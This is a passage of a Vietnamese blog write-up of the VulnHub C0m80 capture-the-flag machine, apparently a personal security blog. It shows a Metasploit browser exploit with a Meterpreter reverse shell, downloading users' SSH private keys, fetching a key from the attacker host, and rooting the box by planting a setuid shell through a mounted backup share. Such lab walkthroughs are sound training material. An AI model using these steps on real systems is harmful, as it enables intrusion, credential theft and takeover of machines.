<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[*] Gathering target information for 10.10.10.12</span><br><span class="line">[*] Sending HTML response to 10.10.10.12</span><br><span class="line">nil versions are discouraged and will be deprecated in Rubygems 4</span><br><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Sending HTML</span><br><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Sending the malicious addon</span><br><span class="line">[*] 10.10.10.12      adobe_flash_hacking_team_uaf - Request: /TbML/tHTebS/</span><br><span class="line">[*] 10.10.10.12      adobe_flash_hacking_team_uaf - Sending HTML...</span><br><span class="line">[*] 10.10.10.12      adobe_flash_hacking_team_uaf - Request: /TbML/tHTebS/ggKSZR.swf</span><br><span class="line">[*] 10.10.10.12      adobe_flash_hacking_team_uaf - Sending SWF...</span><br></pre></td></tr></table></figure>
<p>Tôi quay sang chạy lại kịch bản khai thác với lỗi <em>firefox_proto_crmfrequest</em> với options tương tự.<br><em>(<a target="_blank" rel="noopener" href="https://www.rapid7.com/db/modules/exploit/multi/browser/firefox_proto_crmfrequest">https://www.rapid7.com/db/modules/exploit/multi/browser/firefox_proto_crmfrequest</a>)</em></p>
<p>Lần này thì lấy được session, nhưng shell này bị ngu si thế đéo nào ấy :D<br>Sau một hồi chán nản và quay ra chơi cờ vua với đồng nghiệp, ngồi lại vào ghế, ngắm nghía cẩn thận các option, tôi phát hiện ra đoạn này.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Exploit targets:</span><br><span class="line"></span><br><span class="line">   Id  Name</span><br><span class="line">   --  ----</span><br><span class="line">   0   Universal (Javascript XPCOM Shell)</span><br><span class="line">   1   Native Payload</span><br></pre></td></tr></table></figure>
<p>Ồ nố! Mặc định target đang là ID 0, tức <em>Universal (Javascript XPCOM Shell)</em>. Lúc này cần chú ý đến một phần quan trọng nữa của Metasploit, đó là PAYLOAD.<br>Mặc định, PAYLOAD sẽ là <em>generic&#x2F;shell_reverse_tcp</em>, lúc này Metasploit sẽ tự động chọn một PAYLOAD phù hợp để tải lên. Việc tự động chọn như này, có thể đúng, có thể sai, và trong trường hợp này thì nó đã sai. Có thể nó đã tải lên một PAYLOAD dành cho Linux, hoặc gì gì đó, trong khi dịch vụ FTP này thì đang chạy giả lập Windows, vậy nên sẽ cần một PAYLOAD dành cho Windows. Ở đây tôi chọn là <em>windows&#x2F;meterpreter&#x2F;reverse_tcp</em>.<br><em>Để hiểu đúng, và hiểu rõ về PAYLOAD thì thực sự tôi cũng đéo hiểu :v, hẹn khi nào hiểu thì sẽ update lại bài viết</em><br>Đổi lại target ID 1 và PAYLOAD <em>windows&#x2F;meterpreter&#x2F;reverse_tcp</em>. EXPLOIT!</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Gathering target information for 10.10.10.12</span><br><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Sending HTML response to 10.10.10.12</span><br><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Sending HTML</span><br><span class="line">[*] 10.10.10.12      firefox_proto_crmfrequest - Sending the malicious addon</span><br><span class="line">[*] Sending stage (175174 bytes) to 10.10.10.12</span><br><span class="line">[*] Meterpreter session 1 opened (10.10.10.1:4444 -&gt; 10.10.10.12:47824) at 2021-01-01 21:42:17 +0700</span><br><span class="line">msf6 exploit(multi/browser/firefox_proto_crmfrequest) &gt; sessions -i 1</span><br><span class="line">[*] Starting interaction with 1...</span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 109 created.</span><br><span class="line">Channel 1 created.</span><br><span class="line">Microsoft Windows 5.1.2600 (2.0.2)</span><br><span class="line">Z:\home\b0b&gt;</span><br></pre></td></tr></table></figure>
<p>Giờ thì có thể làm rất rất nhiều việc với <em>meterpreter</em>, ăn trộm cái thư mục .ssh của cả b0b và al1ce về để xem có mối nào vào được shell linux không, chứ shell Command line Windows giả lập thì chịu, chả được cái tích sự gì.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; pwd</span><br><span class="line">Z:\home\b0b</span><br><span class="line">meterpreter &gt; download .ssh ~/boot2root/COM80</span><br><span class="line">[*] downloading: .ssh\.save~ -&gt; /home/#####/boot2root/COM80/.save~</span><br><span class="line">[*] download   : .ssh\.save~ -&gt; /home/#####/boot2root/COM80/.save~</span><br><span class="line">[*] downloading: .ssh\id_rsa -&gt; /home/#####/boot2root/COM80/id_rsa</span><br><span class="line">[*] download   : .ssh\id_rsa -&gt; /home/#####/boot2root/COM80/id_rsa</span><br><span class="line">[*] downloading: .ssh\id_rsa.pub -&gt; /home/#####/boot2root/COM80/id_rsa.pub</span><br><span class="line">[*] download   : .ssh\id_rsa.pub -&gt; /home/#####/boot2root/COM80/id_rsa.pub</span><br><span class="line">[*] downloading: .ssh\known_hosts -&gt; /home/#####/boot2root/COM80/known_hosts</span><br><span class="line">[*] download   : .ssh\known_hosts -&gt; /home/#####/boot2root/COM80/known_hosts</span><br><span class="line">meterpreter &gt; cd ..</span><br><span class="line">meterpreter &gt; cd al1ce</span><br><span class="line">meterpreter &gt; pwd</span><br><span class="line">Z:\home\al1ce</span><br><span class="line">meterpreter &gt; download .ssh ~/boot2root/COM80/alice</span><br><span class="line">[*] downloading: .ssh\authorized_keys -&gt; /home/#####/boot2root/COM80/alice/authorized_keys</span><br><span class="line">[*] download   : .ssh\authorized_keys -&gt; /home/#####/boot2root/COM80/alice/authorized_keys</span><br></pre></td></tr></table></figure>
<p>Nội dung <em>authorized_keys</em> và <em>id_rsa.pub</em> là giống hệt nhau. Điều này có nghĩa là, cái đống .ssh trong thư mục của b0b được dùng để login ssh vào tài khoản của al1ce. Loằng ngoằng vcl! Nhưng ban nãy quét với Nmap thì cũng chả thấy cổng nào mở dịch vụ SSH cả. Lừa nhau à?<br>Lần này sếp xuất hiện phía sau như một vị thần mạch bảo, cổng đấy mở sẵn rồi, chúng mày chỉ việc vào thôi, 6xx22. Okay, giờ thì đi tìm x.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/etc/ssh$ cat ssh_config</span><br><span class="line">...</span><br><span class="line"># What ports, IPs and protocols we listen for</span><br><span class="line">Port 65122</span><br><span class="line"># Use these options to restrict which interfaces/protocols sshd will bind to</span><br><span class="line">ListenAddress ::1</span><br><span class="line">#ListenAddress 127.0.0.1</span><br></pre></td></tr></table></figure>
<p>Yep, đây là lí do tại sao Nmap không mò ra được, vì nó chỉ cho bật lắng nghe trên localhost mà thôi, trên cổng 65122. Nhưng SSH vào với id_rsa không được, vì key không đúng định dạng.<br>Một hồi quan sát chăm chú hết mức có thể, lúc này đã là 17:35 và công ty thì về hết một nửa rồi. Cả mấy anh em đang mò mẫm thì sếp gọi vào phổ biến abc abc… và hint cho một phát là dùng <em>plink</em>.</p>
<h3 id="Plink"><a href="#Plink" class="headerlink" title="Plink"></a>Plink</h3><p>Để sử dụng plink để kết nối ssh, thì phải đổi lại định dạng key lại thành ppk. Không đơn giản là chỉ việc nhấn F2 và sửa tên file, để đổi id_rsa sang ppk phải dùng đến puttygen và cần có <em>passphrase</em>. Ờ, thế <em>passphrase</em> ở đéo đâu bây giờ?</p>
<p>Quay lại với đống file trong thư mục .ssh vừa ăn trộm từ thằng b0b, có cái file <em>.save~</em> lạ vl:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">###### NO PASWORD HERE SRY ######</span><br><span class="line"></span><br><span class="line">I&#x27;m using my new password manager</span><br><span class="line"></span><br><span class="line">           PWMangr2</span><br><span class="line"></span><br><span class="line">      just a note to say</span><br><span class="line"></span><br><span class="line">   WELL DONE &amp; KEEP IT UP ;D</span><br><span class="line"></span><br><span class="line">#################################</span><br></pre></td></tr></table></figure>
<p>Điều này giải đáp câu hỏi bỏ ngỏ ở trên, trình quản lý mật khẩu là gì? là PWMangr2. Search Google về thằng này thì chả có thông tin mẹ gì cả, chỉ toàn là Writeup về đúng cái bài COM80 này. Điều này chứng tỏ 1 điều, PWMangr2 là trình quản lý tự thằng ra đề COM80 này nghĩ ra, giờ thì phải tìm trong toàn hệ thống xem nó ở đâu.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/var/www$ find / PWMangr2 2&gt;/dev/null | grep PWMangr2</span><br><span class="line">/home/b0b/.wine/drive_c/users/b0b/Application Data/Mozilla/Extensions/PWMangr2.html</span><br></pre></td></tr></table></figure>
<p>Đù!<br><img src="/2020/12/29/C0m801-vulnhub/pic5.png"><br>Lịt pẹ! Chả nhẽ lại đem rock-you ra brute force? Hint ở đây là “superbuddies”, bạn thân của thằng lìn Bob là ai? Bố mày biết được à?<br>Kéo lại đoạn trên, với mấy dòng note thì thấy thằng Bob đang muốn đi xem phim cùng Alice &#x3D;)) và đống key lấy được để SSH vào al1ce cũng từ thư mục của thằng b0b. Mạnh dạn đoán mật khẩu ở đây là <em>alice</em> :v Cái này đéo phải tôi đoán, thằng Hoàng Mông To đoán.<br>Yep. Mật khẩu đúng là <em>alice</em>, nếu không đoán được thì hoàn toàn có thể dùng rock-you để brute force vì từ khóa <em>alice</em> có trong cái wordlist ấy.<br><img src="/2020/12/29/C0m801-vulnhub/pic6.png"><br>Khả năng cao đây là <em>passphrase</em> mà chúng ta đang tìm, điền nó vào puttygen để chuyển key sang định dạng ppk thôi nào. Done!<br>Giờ thì chuyển private.ppk sang cho www-data shell và login vào SSH của al1ce.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">www-data@C0m80:/tmp$ wget http://10.10.10.1:8000/private.ppk</span><br><span class="line">--2021-01-01 15:52:55--  http://10.10.10.1:8000/private.ppk</span><br><span class="line">Connecting to 10.10.10.1:8000... connected.</span><br><span class="line">HTTP request sent, awaiting response... 200 OK</span><br><span class="line">Length: 1460 (1.4K) [application/octet-stream]</span><br><span class="line">Saving to: &#x27;private.ppk&#x27;</span><br><span class="line">     0K .                                                     100% 95.7M=0s</span><br><span class="line">2021-01-01 15:52:55 (95.7 MB/s) - &#x27;private.ppk&#x27; saved [1460/1460]</span><br><span class="line"></span><br><span class="line">www-data@C0m80:/tmp$ plink -ssh -P 65122 al1ce@localhost -i private.ppk</span><br><span class="line">plink -ssh -P 65122 al1ce@localhost -i private.ppk</span><br><span class="line">Using username &quot;al1ce&quot;.</span><br><span class="line">Passphrase for key &quot;imported-openssh-key&quot;: 7M6Kt8tC8X5Qz99@Eeb8592Z$Fd@u286</span><br><span class="line">Welcome to C0m80 :DRunning on WandawsXP SP7.4...</span><br><span class="line">Last login: Sat Sep 23 03:18:49 2017 from localhost</span><br><span class="line">$ id</span><br><span class="line">uid=1001(al1ce) gid=34(backup) groups=34(backup)</span><br></pre></td></tr></table></figure>
<p>Ồ zé! Có được shell của al1ce, group backup. Nhưng chưa thể sử dụng sudo do chúng ta login với ssh key, không có mật khẩu để dùng sudo.</p>
<p>Do al1ce thuộc group backup, nên al1ce là owner của thư mục <em>&#x2F;ftpsvr&#x2F;bkp</em>, vậy nên al1ce có thể thêm&#x2F;sửa&#x2F;xóa thư mục này. Điều này quan trọng, vì như đã biết ở trên, thư mục này chúng ta đã mount về máy với thư mục <em>&#x2F;tmp&#x2F;duma</em> với quyền root, khi đã mount, 2 thư mục <em>&#x2F;ftpsvr&#x2F;bkp</em> và <em>&#x2F;tmp&#x2F;duma</em> có thể coi là 1. Điều đó có nghĩa là, khi có quyền root trên <em>&#x2F;tmp&#x2F;duma</em> thì cũng có quyền root trên <em>&#x2F;ftpsvr&#x2F;bkp</em>!<br>Ở shell al1ce, copy <em>&#x2F;bin&#x2F;sh</em> vào <em>&#x2F;ftpsvr&#x2F;bkp&#x2F;</em>.</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">pwd</span></span></span><br><span class="line">/ftpsvr/bkp</span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash"><span class="built_in">cp</span> /bin/sh .</span></span><br></pre></td></tr></table></figure>
<p>Ở root shell trên máy tôi, chuyển quyền sở hữu file <em>sh</em> cho root và set UID cho nó.<br>Ơ thế tại sao không copy luôn bash&#x2F;sh từ root shell trên máy mình vào đấy, đỡ mất công chuyển quyền sở hữu file? Vì chưa chắc bash&#x2F;sh trên máy mình đã tương thích được với hệ thống bên al1ce, có thể khác biệt x86 x64, hoặc nhân Linux, etc… thử mà xem :))</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">ls</span> -al</span>                                                                                         </span><br><span class="line">total 2848</span><br><span class="line">drwxrwx---  2 root   backup    4096 Jan  1 23:05 .</span><br><span class="line">drwxrwxrwt 23 root   root     36864 Jan  1 23:03 ..</span><br><span class="line">-rw-r--r--  1 backup backup 2757002 Jan  1 23:05 ftp104.bkp</span><br><span class="line">-rwxr-xr-x  1   1001 backup  112204 Jan  1 23:05 sh</span><br><span class="line">                                                                                                    </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">chown</span> root sh</span>                                                                                  </span><br><span class="line">                                                                                                    </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">ls</span> -al</span>                                                                                         </span><br><span class="line">total 2848</span><br><span class="line">drwxrwx---  2 root   backup    4096 Jan  1 23:05 .</span><br><span class="line">drwxrwxrwt 23 root   root     36864 Jan  1 23:03 ..</span><br><span class="line">-rw-r--r--  1 backup backup 2757002 Jan  1 23:05 ftp104.bkp</span><br><span class="line">-rwxr-xr-x  1 root   backup  112204 Jan  1 23:05 sh</span><br><span class="line">                                                                                                    </span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">chmod</span> +s sh</span></span><br></pre></td></tr></table></figure>
<p>Quay lại al1ce shell và get root nào!</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">./sh</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">id</span></span></span><br><span class="line">uid=1001(al1ce) gid=34(backup) euid=0(root) groups=0(root),34(backup)</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">cd</span> /root</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">ls</span></span></span><br><span class="line">flag.txt</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash"><span class="built_in">cat</span> flag.txt</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment">############# WELL DONE ###############</span></span></span><br><span class="line"></span><br><span class="line">You dealt BestestSoftware a killer C0m80</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">I really hope you enjoyed the challenge</span><br><span class="line">and learned a thing of two while on your</span><br><span class="line">journey here.</span><br><span class="line"></span><br><span class="line">Please leave feelback &amp; comments at:</span><br><span class="line">	</span><br><span class="line">      https://3mrgnc3.ninja/</span><br><span class="line"></span><br><span class="line">All the best.</span><br><span class="line"></span><br><span class="line">  3mrgnc3 </span><br><span class="line">  ;D</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment">###########  ROOT FLAG ##############</span></span></span><br><span class="line"></span><br><span class="line">   K1ll3rC0m80D3@l7&amp;i5mash3dth1580x</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment">#####################################</span></span></span><br></pre></td></tr></table></figure>
<h3 id="Bonus"><a href="#Bonus" class="headerlink" title="Bonus"></a>Bonus</h3><p>Mặc dù đã có quyền Root nhưng nếu vẫn chưa thoản mãn với cái uid 1001 của Al1ce thì anh em có thể sửa cmn file &#x2F;etc&#x2F;passwd đi để chèn thêm một tài khoản các với UID 0 hoặc sửa password của Root chẳng hạn &#x3D;))<br>Root xịn!</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ su root</span><br><span class="line">Password: 00000</span><br><span class="line"></span><br><span class="line">root@C0m80:~# id</span><br><span class="line">uid=0(root) gid=0(root) groups=0(root)</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/vulnhub/" rel="tag"># vulnhub</a>
              <a href="/tags/difficult/" rel="tag"># difficult</a>
              <a href="/tags/write-up/" rel="tag"># write up</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/12/27/devguru-vulnhub/" rel="prev" title="[VulnHub] DevGuru">
                  <i class="fa fa-angle-left"></i> [VulnHub] DevGuru
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/01/25/ultratech1-tryhackme/" rel="next" title="[TryHackMe] UltraTech1">
                  [TryHackMe] UltraTech1 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">minhnq22</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
